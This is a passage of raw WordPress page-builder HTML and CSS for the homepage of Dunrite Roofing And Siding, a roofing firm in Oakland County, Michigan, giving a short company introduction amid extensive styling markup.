.block-f90851d4-c514-47ae-86e7-eec3151567da.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ec9b4f49-717b-424d-8c1f-2e6b2881e683\"} -->\n<style type=\"text/css\"> .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\"} -->\n<style type=\"text/css\"> .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"2d0e433e-b09c-451a-a1f6-274a9de78652\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-2d0e433e-b09c-451a-a1f6-274a9de78652 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"88555fca-6dda-4435-9d42-f653c9586df1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-88555fca-6dda-4435-9d42-f653c9586df1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"cd3cb9ff-14b9-4cad-bfef-2367d403384a\"} -->\n<style type=\"text/css\"> .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd3cb9ff-14b9-4cad-bfef-2367d403384a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f159bdd-7f31-4f5d-8116-79161efa80a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f159bdd-7f31-4f5d-8116-79161efa80a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"426cabfe-a2cd-4360-aecf-17fd567995fe\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-426cabfe-a2cd-4360-aecf-17fd567995fe background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"6a199a30-74a8-487c-b888-156f1279eaf9\"} -->\n<style type=\"text/css\"> .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6a199a30-74a8-487c-b888-156f1279eaf9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"5a7066fe-d425-4153-8844-d8ae7a4116af\"} -->\n<style type=\"text/css\"> .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a7066fe-d425-4153-8844-d8ae7a4116af\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"6836f24b-2686-4a49-bdc2-b859683a37cf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap 